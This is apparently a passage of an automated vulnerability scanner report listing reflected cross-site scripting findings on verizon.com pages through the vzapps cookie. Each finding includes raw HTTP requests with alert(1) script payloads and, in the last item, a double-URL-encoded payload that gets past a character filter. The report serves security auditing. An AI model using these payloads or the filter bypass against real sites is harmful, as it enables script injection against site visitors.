Cookie: Source=CHSI; vzapps=STATE=TXdd3b4<script>alert(1)</script>757b9633f3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73425
Expires: Sat, 20 Nov 2010 00:13:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=TXdd3b4<script>alert(1)</script>757b9633f3c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDD3B4<SCRIPT>ALERT(1)</SCRIPT>757B9633F3C </DIV>
...[SNIP]...

3.248. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26326'><script>alert(1)</script>0d04466e0c9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX26326'><script>alert(1)</script>0d04466e0c9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73429
Expires: Sat, 20 Nov 2010 00:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX26326'><script>alert(1)</script>0d04466e0c9; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX26326'><SCRIPT>ALERT(1)</SCRIPT>0D04466E0C9 ' />
...[SNIP]...

3.249. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a49de'><script>alert(1)</script>ec31fe281d2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa49de'><script>alert(1)</script>ec31fe281d2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 00:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=TXa49de'><script>alert(1)</script>ec31fe281d2; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA49DE'><SCRIPT>ALERT(1)</SCRIPT>EC31FE281D2 ' />
...[SNIP]...

3.250. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 202c8<script>alert(1)</script>a033bcd02b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX202c8<script>alert(1)</script>a033bcd02b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73632
Expires: Sat, 20 Nov 2010 00:11:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX202c8<script>alert(1)</script>a033bcd02b5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX202C8<SCRIPT>ALERT(1)</SCRIPT>A033BCD02B5 </DIV>
...[SNIP]...

3.251. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8020'><script>alert(1)</script>7e15a2d3a4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc8020'><script>alert(1)</script>7e15a2d3a4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112507
Expires: Sat, 20 Nov 2010 00:15:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXc8020'><script>alert(1)</script>7e15a2d3a4; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC8020'><SCRIPT>ALERT(1)</SCRIPT>7E15A2D3A4 ' />
...[SNIP]...

3.252. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4afcd<script>alert(1)</script>f5636ef73be was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4afcd<script>alert(1)</script>f5636ef73be; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 00:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX4afcd<script>alert(1)</script>f5636ef73be; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4AFCD<SCRIPT>ALERT(1)</SCRIPT>F5636EF73BE </DIV>
...[SNIP]...

3.253. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e9210<script>alert(1)</script>17637724fdd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe9210<script>alert(1)</script>17637724fdd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 00:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=TXe9210<script>alert(1)</script>17637724fdd; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE9210<SCRIPT>ALERT(1)</SCRIPT>17637724FDD </DIV>
...[SNIP]...

3.254. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e8e6'><script>alert(1)</script>b8d520065ab was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e8e6'><script>alert(1)</script>b8d520065ab; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110967
Expires: Sat, 20 Nov 2010 00:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX4e8e6'><script>alert(1)</script>b8d520065ab; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4E8E6'><SCRIPT>ALERT(1)</SCRIPT>B8D520065AB ' />
...[SNIP]...

3.255. http://www22.verizon.com/residential/internet [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/internet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6913f<script>alert(1)</script>c0ed5cd13fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6913f<script>alert(1)</script>c0ed5cd13fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73111
Expires: Sat, 20 Nov 2010 00:16:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6913f<script>alert(1)</script>c0ed5cd13fb; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6913F<SCRIPT>ALERT(1)</SCRIPT>C0ED5CD13FB </DIV>
...[SNIP]...

3.256. http://www22.verizon.com/residential/internet [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/internet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf607'><script>alert(1)</script>af83f93894c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXbf607'><script>alert(1)</script>af83f93894c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73115
Expires: Sat, 20 Nov 2010 00:16:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbf607'><script>alert(1)</script>af83f93894c; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBF607'><SCRIPT>ALERT(1)</SCRIPT>AF83F93894C ' />
...[SNIP]...

3.257. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/specialoffers/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f was submitted in the vzapps cookie. This input was echoed as 4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /residential/specialoffers/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 20 Nov 2010 00:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:44 GMT
Connection: close
